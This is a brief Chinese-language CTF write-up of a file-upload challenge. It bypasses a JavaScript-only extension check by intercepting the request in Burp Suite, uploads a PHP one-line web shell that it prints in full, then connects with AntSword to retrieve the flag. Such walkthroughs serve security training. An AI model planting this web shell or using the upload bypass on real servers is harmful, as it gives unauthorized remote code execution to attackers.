这题题干说的很清楚,js绕过,所以后面做题从这个方面考虑
首先我们要判断网页是什么代码,以便准备好代码
先随便上传一个文件,发现是php
那我们准备好php一句话木马
<?php @eval($_POST['woshimuma']);?>
引号括起来的就是连接的密码。
接着我们通过按下F12观察下页面的代码
很明显存在过滤,这时我们可以采取两种方法,第一种是使用bp修改,第二种是修改前端的判断函数。以bp修改为例子往下做
点击上传,然后使用bp拦截后修改为php
上传过去
上传成功
接着我们用蚁剑连接一下
填好相关信息,进去看看,找到key